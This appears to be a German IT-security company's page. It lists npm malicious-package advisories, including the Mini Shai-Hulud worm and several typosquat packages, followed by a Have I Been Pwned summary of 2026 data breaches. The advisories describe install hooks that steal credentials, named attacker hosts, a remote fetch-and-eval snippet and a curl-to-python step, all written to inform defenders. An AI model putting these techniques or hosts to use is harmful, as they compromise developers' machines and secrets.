Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`fixed-round`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (f662c7a4b282b621e19219c12e5003d18c26e334e83bf943775b546352fbd8d2) The package fixed-round was found to contain malicious code. ## Source: ghsa-malware (addb02861d5f53e7cbf4a7c720230073ba413b5a2e32da2473e595fac00bb2fd) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-4548 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (68e8941c301603919022f1d67d311d576d5d5efcac7ed7cb0d3526cb71e829d6) On `npm install`, the package's postinstall.js runs `whoami` and reads `os.hostname()`, `os.platform()`, the current working directory, and CI-related environment variables (CI, GITHUB_REPOSITORY, NODE_ENV), then transmits them via HTTPS GET and DNS lookup to an interactsh out-of-band collector at `lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com` under path `/nasa/dds-js-canary/`. The package self-describes as a 'Security research canary — NASA VDP', and the name + beacon path indicate a dependency-confusion canary targeting an internal NASA package namespace. Regardless of stated research intent, every installer's machine identity and CI/CD context are sent to a third-party OOB collector without consent at install time. ## Source: ghsa-malware (b3a227a99e4f8297075b3f3fdef0fcc8a176316ff47eaed7ce9cf46a1dfd5312) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-4513 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (f7e00f81e117716cfd7fd3565cf8b04073cd494a6da2c23749669133806a7473) Package name `chai-as-tuned` impersonates `chai-as-promised` and ships a README copy-pasted from the unrelated pino project (npm/CI badges point at pinojs/pino). The advertised middleware in `index.js` spawns `lib/initializeCaller.js` as a detached node process whenever the exported function is invoked. That script constructs a fake local `process` object whose `DEV_API_KEY` is a base64 literal decoding to `https://aqua-margit-84.tiiny.site/index.json` (tiiny.site is an anonymous static-hosting service), GETs the JSON via axios, and passes the `response.cookie` field to `new Function.constructor('require', response)(require)` — executing attacker-controlled JavaScript with full Node privileges and access to the host's `require`. The combination of name-confusion, copied README, base64-hidden C2 URL, `Function.constructor` indirection to defeat static review, and remote-fetch-and-eval is an unambiguous supply-chain attack: any consumer who follows the README and uses the main export will execute whatever code the attacker serves at runtime. ## Source: ghsa-malware (456afd075e2df98b9a07a876eb8b1e26cff0afe3f517d7b0f226f654e3e22bed) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-4131 vor 2 Stunde(n)
Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`canvas-nest.js`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (1965d84fed1acfe551b8e09b8fcb3bfb37c1bad93bcadf6bb65922c0fd8ae64f) The package canvas-nest.js was found to contain malicious code. ## Source: ghsa-malware (ac343e3d929beb16108282764c28ad42b272704800034466df25f1cd805eb33d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-3761 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (b6735be7311be4f6b4f609762cfb77504fe141bc9d8d5b5c0a75d521119aa2fa) The package's npm postinstall hook executes a one-liner that uses child_process.exec to curl/wget an unpinned Python script from a personal user's GitHub Gist (gist.githubusercontent.com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py) and pipes it directly to python3 (with a node fallback). The captured stdout is additionally passed to eval(). The remote URL is mutable, unauthenticated, and not version-pinned, so the Gist owner can change the executed payload at any time. The package itself has no functional library surface — index.js contains only `module.exports = {};` — and the package name 'ethers-signing-key' impersonates the ethers blockchain library (which exposes a SigningKey class), so the only meaningful effect of `npm install ethers-signing-key` is arbitrary remote code execution on the installer's machine at install time. ## Source: ghsa-malware (aa6ac62c8f62bce87d42fe3fccb998c223086ee5f529221f4342177c0798627a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Das "CVE"-Repository (eng. Common Vulnerabilities and Exposures) stellt eine Liste bekannter Schwachstellen und Sicherheitslücken in IT-Systemen unter Führung des "US-amerikanischen National Cybersecurity" zusammen und bewertet diese anhand Ihres Risikos auf einer Skala von eins bis zehn.


Gerade im Bereich von Web-Technologien und Cloud-Software werden regelmäßig Hacks und Sicherheitslücken bekannt. Die betroffenen Unternehmen erleiden in der Regel nicht nur einen Image-Schaden sondern stehen womöglich gegenüber Ihren Kunden auch in der rechtlichen Verantwortung. Das Projekt "Have I Been Pwned" sammelt seit Jahren Daten die aus Hacks oder Datenlecks öffentlich zugänglich werden und bietet einen Service um zu prüfen, ob man selbst von diesen Hacks betroffen wurde.

23.05.2026 - Charter 4.851.517 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses

In May 2026, the telecommunications company Charter Communications (the parent company behind the consumer broadband and cable brand Spectrum) was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group later published the data, which exposed 4.9M unique email addresses along with names, phone numbers and physical addresses. A subset of approximately 85k records originating from an internal employee directory also included job titles. Charter confirmed the incident, but stated that no sensitive personal information or customer proprietary network information (CPNI) was exfiltrated.
05.05.2026 - Cushman & Wakefield 310.431 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations

In May 2026, the real estate services firm Cushman & Wakefield was the target of a "pay or leak" extortion campaign by the ShinyHunters group. Following the threat, the group publicly published data they alleged had been obtained from the firm, consisting mostly of C&W email addresses along with tens of thousands of external email addresses and corporate contact records. The exposed data was primarily business information, including names, job titles, company addresses and phone numbers.
30.04.2026 - Reborn Gaming 126 Datensätze geleaked
Email addresses, IP addresses

In April 2026, the gaming community Reborn Gaming suffered a data breach due to a vulnerability in cPanel and WebHost Manager (WHM). The breach exposed 126 unique email addresses along with IP addresses and Steam IDs. Reborn Gaming self-submitted the data to Have I Been Pwned.
28.04.2026 - Vimeo 119.167 Datensätze geleaked
Email addresses, Names

In April 2026, the ShinyHunters extortion group listed Vimeo on their extortion portal as part of their "pay or leak" campaign. They subsequently published hundreds of gigabytes of data, predominantly consisting of video titles, technical data and metadata. The data also included 119k unique email addresses, sometimes accompanied by names. Vimeo attributed the exposure to a breach of Anodot, a third-party analytics vendor, and advised the incident does not include "Vimeo video content, valid user login credentials, or payment card information".
26.04.2026 - CTT 468.124 Datensätze geleaked
Email addresses, Names, Phone numbers

In April 2026, data allegedly obtained from CTT, Portugal's national postal service, was posted to a public hacking forum. The data included 468k unique email addresses along with names, phone numbers and parcel tracking numbers which can be used to retrieve the tracking history of the parcel.
24.04.2026 - Udemy 1.401.259 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Payment methods, Phone numbers, Physical addresses

In April 2026, online training company Udemy was the victim of a “pay or leak” extortion attempt perpetrated by the ShinyHunters group. The data was subsequently leaked publicly and contained 1.4M unique email addresses belonging to customers and instructors. The data also included names, physical addresses, phone numbers, employer information and instructor payout methods including PayPal, cheque and bank transfer.
20.04.2026 - ADT 5.488.888 Datensätze geleaked
Dates of birth, Email addresses, Names, Partial government issued IDs, Phone numbers, Physical addresses

In April 2026, home security firm ADT confirmed a data breach by ShinyHunters, which listed the company on its website as part of a "pay or leak" extortion attempt. The breach impacted 5.5M unique email addresses along with names, phone numbers and physical addresses. ADT also advised that "in a small percentage of cases, dates of birth and the last four digits of Social Security numbers or Tax IDs were included" and that it had contacted all affected people.
20.04.2026 - Aman 215.563 Datensätze geleaked
Dates of birth, Email addresses, Genders, Language preferences, Names, Nationalities, Phone numbers, Physical addresses, Spouses names, VIP statuses

In April 2026, the ultra-luxury hotel brand Aman was named by ShinyHunters as the target of a "pay or leak" extortion campaign, with the data allegedly obtained from their Salesforce CRM. The data was subsequently leaked publicly and contained over 200k unique email addresses. Whilst not present on all records, the data also included genders, physical addresses, phone numbers, nationalities, dates of birth, spouse names and VIP status codes.
20.04.2026 - Canada Life 237.810 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations, Support tickets

In April 2026, Canada Life was the victim of a "pay or leak" extortion campaign by the ShinyHunters group. The group subsequently published the data which contained over 200k unique email addresses along with names, phone numbers, physical addresses and, in some cases, customer support tickets. In their disclosure notice, Canada Life advised that "it is a small proportion of our customers who may have been impacted". In the wake of the incident, Canada Life also published an alert cautioning customers to be wary of phishing attacks, a pattern often seen after the public release of breached data.
20.04.2026 - Pitney Bowes 8.243.989 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses

In April 2026, the hacking collective ShinyHunters claimed to have obtained data from Pitney Bowes as part of a broader extortion campaign that also named several other organisations. After negotiations allegedly failed, the group publicly released the data which included 8.2M unique email addresses, along with names, phone numbers and physical addresses. A subset of the data also included Pitney Bowes employee records with job titles.
18.04.2026 - Carnival 7.531.359 Datensätze geleaked
Dates of birth, Email addresses, Genders, Geographic locations, Loyalty program details, Names, Salutations

In April 2026, the notorious hacking collective ShinyHunters claimed they had obtained a substantial volume of data belonging to the Carnival cruise operator and attempted to extort the organisation to prevent the data from being leaked. The following week, the group published the data publicly, which contained 8.7M records with 7.5M unique email addresses. The data contained fields indicating it related to the Mariner Society loyalty program run by Holland America, a cruise line brand under Carnival, and included names, dates of birth, genders and data relating to status within the loyalty program. Carnival acknowledged a phishing incident involving a single user account and advised they were working to better understand the scope of the unauthorised activity.
15.04.2026 - Kemper 269.299 Datensätze geleaked
Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases

In April 2026, the American insurance holding company Kemper Corporation was named by the ShinyHunters ransomware group in a "pay or leak" extortion campaign. The attackers allegedly accessed Kemper's Salesforce environment via social engineering as part of a broader campaign targeting hundreds of organisations using the same method. The group later published tens of gigabytes of data they claimed included internal directory data, Salesforce records and Stripe payment logs. Among the 269k unique email addresses were names, phone numbers, physical addresses and partial payment card data including the last 4 digits, expiry dates and card brands. Kemper confirmed the incident and stated they had engaged third-party cybersecurity experts and notified law enforcement.
15.04.2026 - Zara 197.376 Datensätze geleaked
Email addresses, Geographic locations, Purchases, Support tickets

In April 2026, the fashion brand Zara was among a number of organisations targeted by the ShinyHunters extortion group as part of their "pay or leak" campaign. The group claimed the breach was related to a compromise of the Anodot analytics platform and subsequently published a terabyte of data allegedly including 95M support ticket records. The data contained 197k unique email addresses alongside product SKUs, order IDs and the market the support ticket originated in. Zara's parent company Inditex advised that the incident didn't affect passwords or payment information.
14.04.2026 - Abrigo 711.099 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses

In April 2026, the fintech software company Abrigo was targeted in a "pay or leak" extortion attempt by the ShinyHunters group. Shortly after, data allegedly taken from the company's Salesforce instance was published publicly and contained over 700k unique email addresses belonging to both Abrigo staff and external contacts. Whilst separate from Abrigo's Salesforce compromise via the Drift application connector the previous year, the data fields described in that incident are consistent with the ShinyHunters data, namely that it was "business contact information" including "institution name, employee name, email addresses, and phone numbers".
12.04.2026 - Marcus & Millichap 1.837.078 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses

In April 2026, the commercial real estate brokerage firm Marcus & Millichap was named as one of multiple alleged victims of the ShinyHunters hacking and extortion group. Data alleged to have been obtained from the company was subsequently released publicly and included 1.8M unique email addresses, along with names, phone numbers and employment-related information including employer, job title and physical company address. In their disclosure notice, Marcus & Millichap advised that data which may have been accessed appeared limited to "company forms, templates, marketing materials, and general contact information".
12.04.2026 - Mytheresa 84.108 Datensätze geleaked
Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases, Salutations

In April 2026, the luxury fashion e-commerce platform Mytheresa was listed as a victim of the ShinyHunters "pay or leak" extortion group. After the ransom deadline passed, the group publicly released the data which contained 84k unique email addresses. The exposed data also included names, phone numbers, physical addresses, purchases and partial credit card data including card type, last 4 digits and expiry date.
10.04.2026 - McGraw Hill 13.500.136 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses

In April 2026, education company McGraw Hill confirmed a data breach following an extortion attempt. Attributed to a Salesforce misconfiguration, the company stated the incident exposed "a limited set of data from a webpage hosted by Salesforce on its platform". More than 100GB of data was later publicly distributed, containing 13.5M unique email addresses across multiple files, with additional fields such as name, physical address and phone number appearing inconsistently across some records.
08.04.2026 - 7-Eleven 185.256 Datensätze geleaked
Dates of birth, Email addresses, Names, Phone numbers, Physical addresses

In April 2026, 7-Eleven was the victim of a "pay or leak" extortion campaign by ShinyHunters, with the data later published that month. The incident exposed 185k unique email addresses, along with names, physical addresses, dates of birth and phone numbers. A small number of records also contained additional exposed data fields. The company later advised the breach was limited to "certain 7-Eleven systems used to store franchisee documents", a statement consistent with the exposed data.
07.04.2026 - My Lovely AI 106.271 Datensätze geleaked
Email addresses, Social media profiles

In April 2026, the NSFW AI girlfriend platform My Lovely AI suffered a data breach that exposed over 100k users. The data included user-created prompts and links to the resulting AI-generated images, along with a small number of Discord and X usernames.
06.04.2026 - LegionProxy 10.144 Datensätze geleaked
Email addresses, Names, Passwords, Purchases

In April 2026, the commercial residential and ISP proxy network LegionProxy suffered a data breach. The incident exposed 10k email addresses, bcrypt password hashes, names and purchases.
03.04.2026 - Amtrak 2.147.679 Datensätze geleaked
Email addresses, Names, Physical addresses, Support tickets

In April 2026, the hacking group ShinyHunters claimed they had breached Amtrak. The group typically compromises organisations' Salesforce instances before demanding a ransom and later, if not paid, dumping the data publicly. They subsequently published the alleged data which contained over 2M unique email addresses along with names, physical addresses and customer support records.
02.04.2026 - SongTrivia2 291.739 Datensätze geleaked
Auth tokens, Avatars, Email addresses, Names, Passwords, Usernames

In April 2026, the music trivia platform SongTrivia2 suffered a data breach that was subsequently published to a public hacking forum. The data contained a total of 291k unique email addresses sourced from either Google OAuth logins or accounts created on the site, the latter also containing bcrypt password hashes. The data also included names, usernames and avatars.
31.03.2026 - Hallmark 1.736.520 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses, Support tickets

In March 2026, Hallmark suffered an alleged breach and subsequent extortion after attackers gained access to data stored within Salesforce. The data was later published after the extortion deadline passed, exposing 1.7M unique email addresses across both Hallmark and the Hallmark+ streaming service, along with names, phone numbers, physical addresses and support tickets.
27.03.2026 - ZenBusiness 5.118.184 Datensätze geleaked
Email addresses, Names, Phone numbers

In March 2026, the hacker and extortion group "ShinyHunters" claimed to have obtained a substantial corpus of data from ZenBusiness, a business formation and compliance platform. The group claimed the data had been exfiltrated from platforms including Snowflake, Mixpanel and Salesforce, and threatened to publish it if a ransom was not paid. The following month, after claiming payment had not been made, ShinyHunters publicly released the data. The collection amounted to many terabytes across thousands of files that appeared to originate from multiple systems and business functions, including leads, support records and other CRM-related data. The data contained approximately 5M unique email addresses, often accompanied by name and phone number depending on the source file.
26.03.2026 - BreachForums Version 5 339.778 Datensätze geleaked
Email addresses, Passwords, Usernames

In March 2026, a breach of one of the many iterations of the BreachForums hacking forum known as "Version 5" was publicly disclosed. The incident exposed 340k unique email addresses along with usernames and argon2 password hashes.
25.03.2026 - Addi 34.532.941 Datensätze geleaked
Age groups, Credit scores, Device information, Email addresses, Government issued IDs, Income levels, IP addresses, Latitude and longitude pairs, Names, Phone numbers, Physical addresses, Purchases, Socioeconomic levels

In March 2026, the Colombian fintech company Addi identified unauthorised activity on its platform and advised customers that "it is possible that your personal information may have been compromised". The "pay or leak" extortion group ShinyHunters subsequently claimed responsibility and published a large trove of personal data allegedly obtained from Addi. The data included 34M unique email addresses from credit scoring requests, credit bureau records, customer identity records and email validation logs. It also contained government issued IDs (Cédula de Ciudadanía), estimated income, socioeconomic levels, purchases and other credit-related data points.
25.03.2026 - Sound Radix 292.993 Datensätze geleaked
Email addresses, Names, Passwords

In March 2026, the audio production tools company Sound Radix disclosed a data breach that they subsequently self-submitted to HIBP. The incident impacted 293k unique email addresses and names. Sound Radix advised that it is possible that additional data including hashed passwords may have been exposed, and that no financial or credit card information was impacted.
13.03.2026 - Divine Skins 105.814 Datensätze geleaked
Email addresses, Purchases, Usernames

In March 2026, the League of Legends custom skins service Divine Skins suffered a data breach. The incident was disclosed via the service's Discord server, where Divine Skins stated that an unauthorised third party accessed part of its systems, deleted all skins from the database and exposed email addresses and usernames. The data also contained a history of purchases made by users.
12.03.2026 - Crunchyroll 1.195.684 Datensätze geleaked
Email addresses

In March 2026, the anime streaming service Crunchyroll suffered a data breach alleged to have impacted 6.8M users. The exposed data is reported to have originated from the company's Zendesk support system where "name, login name, email address, IP address, general geographic location and the contents of the support tickets" were exposed. A subset of 1.2M email addresses from an alleged 2M record dataset being sold was later provided to HIBP.
08.03.2026 - Baydöner 1.266.822 Datensätze geleaked
Dates of birth, Email addresses, Genders, Geographic locations, Government issued IDs, Names, Passwords, Phone numbers, Purchases

In March 2026, the Turkish restaurant chain Baydöner suffered a data breach which was subsequently published to a public hacking forum. The incident exposed over 1.2M unique email addresses along with names, phone numbers, cities of residence and plaintext passwords. A small number of records also included Turkish national ID number and date of birth. In their disclosure notice, Baydöner stated that payment and financial data was not affected.
06.03.2026 - Aura 903.080 Datensätze geleaked
Customer service comments, Email addresses, IP addresses, Names, Phone numbers, Physical addresses

In March 2026, the online safety service Aura disclosed a data breach that exposed 900k unique email addresses. The data was primarily associated with a marketing tool from a previously acquired company, with fewer than 20k active Aura customers affected. Exposed data included names, phone numbers, physical and IP addresses, and customer service notes. Aura advised that no Social Security numbers, passwords or financial information were compromised.
04.03.2026 - SUCCESS 253.510 Datensätze geleaked
Device information, Email addresses, IP addresses, Names, Passwords, Phone numbers, Physical addresses, Purchases

In March 2026, the personal development and achievement media brand SUCCESS suffered a data breach. The incident exposed 250k unique email addresses along with names, IP addresses, phone numbers and, for a limited number of staff members, bcrypt password hashes. The data also included orders containing physical addresses and the payment method used. In SUCCESS' disclosure notice, they advised their system had also been abused to send offensive newsletters with quotes falsely attributed to contributors.
04.03.2026 - Woflow 447.593 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses

In March 2026, the AI-driven merchant data platform Woflow was named as a victim by the ShinyHunters data extortion group. The group subsequently published tens of thousands of files allegedly obtained from the company, comprising more than 2TB of data. The trove included hundreds of thousands of email addresses, names, phone numbers and physical addresses, with the data indicating it related to Woflow customers and, in turn, the customers of merchants using their platform.
02.03.2026 - Ameriprise 502.597 Datensätze geleaked
Email addresses, Employers, Financial transactions, Job titles, Names, Phone numbers, Physical addresses

In March 2026, the financial services firm Ameriprise Financial was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group claimed possession of more than 200GB of compressed data exfiltrated from Ameriprise's Salesforce environment and internal SharePoint infrastructure, and subsequently published the data after negotiations allegedly failed. The published data contained 500k unique email addresses as well as names, phone numbers, physical addresses and employer information. In their disclosure to state attorneys general, Ameriprise reported 47,876 affected people; the larger email address population represents contacts from Ameriprise's broader operational systems, including internal staff. Ameriprise further advised that they have "implemented heightened monitoring of your account(s) to include enhanced identity verification procedures".
25.02.2026 - KomikoAI 1.060.191 Datensätze geleaked
AI prompts, Email addresses, Forum posts, Names

In February, the AI-powered comic generation platform KomikoAI suffered a data breach. The incident exposed 1M unique email addresses along with names, user posts and the AI prompts used to generate content. The exposed data enables the mapping of individual AI prompts to specific email addresses.
25.02.2026 - Lovora 495.556 Datensätze geleaked
Display names, Email addresses, Profile photos

In February 2026, the couples and relationship app Lovora allegedly suffered a data breach that exposed 496k unique email addresses. The data also included users’ display names and profile photos, along with other personal information collected through use of the app. The app’s maker, Plantake, did not respond to multiple attempts to contact them about the incident.
17.02.2026 - Quitbro 22.874 Datensätze geleaked
Email addresses, Partial dates of birth, Usernames

In February 2026, the porn addiction app Quitbro allegedly suffered a data breach that exposed 23k unique email addresses. The data also included users’ years of birth, responses to questions within the app and their last recorded relapse time. The app’s maker, Plantake, did not respond to multiple attempts to contact them about the incident.
14.02.2026 - CarGurus 12.461.887 Datensätze geleaked
Email addresses, IP addresses, Names, Phone numbers, Physical addresses

In February 2026, the automotive marketplace CarGurus was the target of a data breach attributed to the threat actor ShinyHunters. Following an attempted extortion, the data was published publicly and contained more than 12M email addresses across multiple files including user account ID mappings, finance pre-qualification application data and dealer account and subscription information. Impacted data also included names, phone numbers, physical and IP addresses, and auto finance application outcomes.
12.02.2026 - Odido 6.077.025 Datensätze geleaked
Bank account numbers, Customer service comments, Dates of birth, Driver's licenses, Email addresses, Genders, Government issued IDs, Names, Passport numbers, Phone numbers, Physical addresses

In February 2026, Dutch telco Odido was the victim of a data breach and subsequent extortion attempt. Shortly after, a total of 6M unique email addresses were published across four separate data releases over consecutive days. The exposed data includes names, physical addresses, phone numbers, bank account numbers, dates of birth, customer service notes and passport, driver’s licence and European national ID numbers. Odido has published a disclosure notice including an FAQ to support affected customers.
06.02.2026 - Toy Battles 1.017 Datensätze geleaked
Chat logs, Email addresses, IP addresses, Usernames

In February 2026, the online gaming community Toy Battles suffered a data breach. The incident exposed 1k unique email addresses alongside usernames, IP addresses and chat logs. Following the breach, Toy Battles self-submitted the data to Have I Been Pwned.
Sind Sie betroffen? Hier prüfen!






Unsere TÜV-geprüften Berater sind für Sie da!

Wir haben Experten sowohl für die rechtlichen Anforderungen durch die DSGVO und das Bundesdatenschutzgesetz als auch für die technische Seite der IT-Sicherheit. Wir können Sie dahingehend über mögliche technische Risiken und Schutzmaßnahmen gleichermaßen beraten wir zur Umsetzung der gesetzlichen Anforderungen an den Datenschutz im Unternehmen und im Verein. Von den technischen und organisatorischen Maßnahmen über das Verfahrensverzeichnis sowie die praktische Umsetzung der Vorgaben können wir Sie gerne unterstützen.

Unsere Datenschutz-Experten beraten Sie gerne »





Keine Angst vor der DSGVO - wir helfen!










© 2012 - 2026 | SD Software-Design GmbH
Impressum | Datenschutz | Karriere | Online-Services